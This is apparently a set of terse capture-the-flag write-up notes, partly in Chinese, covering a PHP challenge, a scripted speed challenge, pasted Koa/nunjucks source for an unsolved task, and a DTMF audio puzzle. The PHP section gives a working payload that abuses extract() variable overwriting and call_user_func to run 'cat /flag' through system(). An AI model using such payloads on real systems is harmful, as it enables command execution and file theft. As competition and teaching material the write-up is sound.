WEB
EDR
extract($argv);
var_dump($collect);
if (!isset($limit)) {
return;
}
$result = $collect($path, $row, $limit, $host);变量覆盖 加 call_user_func
payload
host=cat /flag&limit=system&path=call_user_func&row=call_user_func&collect=call_user_funcfast x 3
原题
import requests
import re,urllib.parse,binascii
# 必须要有Cookie,否则每次读取的值不一样,不能正常解题
header = {
"Cookie":"session=3318ae57-680f-45f8-864a-14dbdf736032; PHPSESSID=397hupqilugksvv6ebidg8dha1"
}
url = "http://180.109.90.207:23939"
rep = requests.get(url,headers=header)
ress = rep.text
res = re.findall('id="math">(.*?)</div></b>',ress)
print(res)
n = len(res[0])
re = res[0]
a= []
for i in range(0,n):
a.append(re[i])
a.sort()
b = []
count = 0
for i in range(0,n-1):
if(a[i] != a[i+1]):
b.append(a[i])
b.append(a[-1])
count = []
mnm = []
for i in range (len(b)):
mmm = 0
for j in range(len(a)):
if(b[i] == a[j]):
mmm = mmm + 1
mnm.append(mmm)
count.append(mmm)
count.sort()
sss =''
print(mnm,count)
for i in range(len(b)):
for j in range(len(b)):
if(count[i] == mnm[j] ):
sss=sss+b[j]
print(sss)
data= {
"res":sss
}
ccc = requests.post(url,data=data,headers=header)
print(ccc.text)Shiro
Reset [没有做出来]
获得源代码
app.js
const Koa = require('koa');
const bodyParser = require('koa-bodyparser');
const controller = require('./controller');
const templating = require('./templating');
const app = new Koa();
const isProduction = process.env.NODE_ENV === 'production';
app.use(async (ctx, next) => {
console.log(`Process ${ctx.request.method} ${ctx.request.url}...`);
await next();
});
let staticFiles = require('./static-files');
app.use(staticFiles('/static/', __dirname + '/static'));
app.use(bodyParser());
app.use(templating('views', {
noCache: !isProduction,
watch: !isProduction
}));
app.use(controller());
app.listen(3000);
console.log('app started at port 3000...');controller.js
const fs = require('fs');
function addMapping(router, mapping) {
for (var url in mapping) {
if (url.startsWith('GET ')) {
var path = url.substring(4);
router.get(path, mapping[url]);
console.log(`register URL mapping: GET ${path}`);
} else if (url.startsWith('POST ')) {
var path = url.substring(5);
router.post(path, mapping[url]);
console.log(`register URL mapping: POST ${path}`);
} else if (url.startsWith('PUT ')) {
var path = url.substring(4);
router.put(path, mapping[url]);
console.log(`register URL mapping: PUT ${path}`);
} else if (url.startsWith('DELETE ')) {
var path = url.substring(7);
router.del(path, mapping[url]);
console.log(`register URL mapping: DELETE ${path}`);
} else {
console.log(`invalid URL: ${url}`);
}
}
}
function addControllers(router, dir) {
fs.readdirSync(__dirname + '/' + dir).filter((f) => {
return f.endsWith('.js');
}).forEach((f) => {
console.log(`process controller: ${f}...`);
let mapping = require(__dirname + '/' + dir + '/' + f);
addMapping(router, mapping);
});
}
module.exports = function (dir) {
let
controllers_dir = dir || 'controllers',
router = require('koa-router')();
addControllers(router, controllers_dir);
return router.routes();
};templating.js
const nunjucks = require('nunjucks');
function createEnv(path, opts) {
var
autoescape = opts.autoescape === undefined ? true : opts.autoescape,
noCache = opts.noCache || false,
watch = opts.watch || false,
throwOnUndefined = opts.throwOnUndefined || false,
env = new nunjucks.Environment(
new nunjucks.FileSystemLoader(path, {
noCache: noCache,
watch: watch,
}), {
autoescape: autoescape,
throwOnUndefined: throwOnUndefined
});
if (opts.filters) {
for (var f in opts.filters) {
env.addFilter(f, opts.filters[f]);
}
}
return env;
}
function templating(path, opts) {
var env = createEnv(path, opts);
return async (ctx, next) => {
ctx.render = function (view, model) {
ctx.response.body = env.render(view, Object.assign({}, ctx.state || {}, model || {}));
ctx.response.type = 'text/html';
};
await next();
};
}
module.exports = templating;MISC
DTMF
audacity 转换音频格式
再利用dtmf2num.exe 获得信息
